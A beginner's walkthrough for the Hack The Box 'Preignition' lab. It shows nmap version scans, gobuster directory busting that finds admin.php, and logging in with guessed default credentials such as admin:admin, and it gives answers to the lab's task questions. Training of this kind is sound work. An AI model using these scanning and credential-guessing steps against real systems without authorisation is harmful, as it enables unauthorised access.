HTB - Preignition - Walkthrough

The aim of this walkthrough is to provide help with the Preignition machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>

┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $

You could use the unset command to remove it after you no longer need it.

┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $

TASK 1

Question: Directory Brute-forcing is a technique used to check a lot of paths on a web server to find hidden pages. Which is another name for this? (i) Local File Inclusion, (ii) dir busting, (iii) hash cracking.

The internet is such a helpful friend…

dir busting

TASK 2

Question: What switch do we use for nmap’s scan to specify that we want to perform version detection

Run nmap's help to determine the correct switch/option/flag…

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap --help
...
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
...

-sV

TASK 3

Question: What does Nmap report is the service identified as running on port 80/tcp?

Run the default nmap scan against the target machine.

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:07 BST
Nmap scan report for 10.129.211.155
Host is up (0.11s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

http

TASK 4

Question: What server name and version of service is running on port 80/tcp?

Now, run nmap with the options determined in TASK 2.

─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -sV -p 80 $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:09 BST
Nmap scan report for 10.129.211.155
Host is up (0.012s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.2

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

nginx 1.14.2

TASK 5

Question: What switch do we use to specify to Gobuster we want to perform dir busting specifically?

Well, how about some –help again…

┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $gobuster --help
Usage:
  gobuster [command]

Available Commands:
  dir         Uses directory/file enumeration mode
  dns         Uses DNS subdomain enumeration mode
  fuzz        Uses fuzzing mode
  help        Help about any command
  s3          Uses aws bucket enumeration mode
  version     shows the current version
  vhost       Uses VHOST enumeration mode

Flags:
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
  -h, --help              help for gobuster
      --no-error          Don't display errors
  -z, --no-progress       Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -p, --pattern string    File containing replacement patterns
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

Use "gobuster [command] --help" for more information about a command.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

dir

TASK 6

Question: When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?

And again…

─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $gobuster dir --help
Uses directory/file enumeration mode

Usage:
  gobuster dir [flags]

Flags:
  -f, --add-slash                       Append / to each request
  -c, --cookies string                  Cookies to use for the requests
  -d, --discover-backup                 Upon finding a file search for backup files
      --exclude-length ints             exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes.
  -e, --expanded                        Expanded mode, print full URLs
  -x, --extensions string               File extension(s) to search for
  -r, --follow-redirect                 Follow redirects
  -H, --headers stringArray             Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
  -h, --help                            help for dir
      --hide-length                     Hide the length of the body in the output
  -m, --method string                   Use the following HTTP method (default "GET")
  -n, --no-status                       Don't print status codes
  -k, --no-tls-validation               Skip TLS certificate verification
  -P, --password string                 Password for Basic Auth
      --proxy string                    Proxy to use for requests [http(s)://host:port]
      --random-agent                    Use a random User-Agent string
  -s, --status-codes string             Positive status codes (will be overwritten with status-codes-blacklist if set)
  -b, --status-codes-blacklist string   Negative status codes (will override status-codes if set) (default "404")
      --timeout duration                HTTP Timeout (default 10s)
  -u, --url string                      The target URL
  -a, --useragent string                Set the User-Agent string (default "gobuster/3.1.0")
  -U, --username string                 Username for Basic Auth
      --wildcard                        Force continued operation when wildcard found

Global Flags:
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
      --no-error          Don't display errors
  -z, --no-progress       Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -p, --pattern string    File containing replacement patterns
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

-x php

TASK 7

Question: What page is found during our dir busting activities?

Use the -u flag to specify the target url, and the -w flag, to specify which wordlist you are using for the directory/file enumeration. One of the most commonly used one can be found at /usr/share/wordlists/dirb/common.txt. (It may requires you to install the seclists package)

┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $gobuster dir -x php -w /usr/share/wordlists/dirb/common.txt -u $rhost
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.211.155
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/05/04 20:18:30 Starting gobuster in directory enumeration mode
===============================================================
/admin.php            (Status: 200) [Size: 999]
/admin.php            (Status: 200) [Size: 999]
                                               
===============================================================
2023/05/04 20:18:41 Finished
===============================================================
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $

admin.php

TASK 8

Question: What is the HTTP status code reported by Gobuster for the discovered page?

See the gobuster enumeration results in the previous task.

200

SUBMIT FLAG

Question: Submit root flag

Well, we can guess that there must be something to be found under the admin.php site, so check it out.

Use your browser to open up the http://<target-machine-ip>/admin.php website. Once the page is loaded, you will be asked for a username and password pair.

Since this is the admin log-in page, we can guess, that one of our users could be named admin. Trying out some default credentials (admin:password | admin:Password | admin:admin) will provide you with the flag.

flag

Make sure to terminate the target box before you continue with the next machine!

SETUP#

TASK 1#

TASK 2#

TASK 3#

TASK 4#

TASK 5#

TASK 6#

TASK 7#

TASK 8#

SUBMIT FLAG#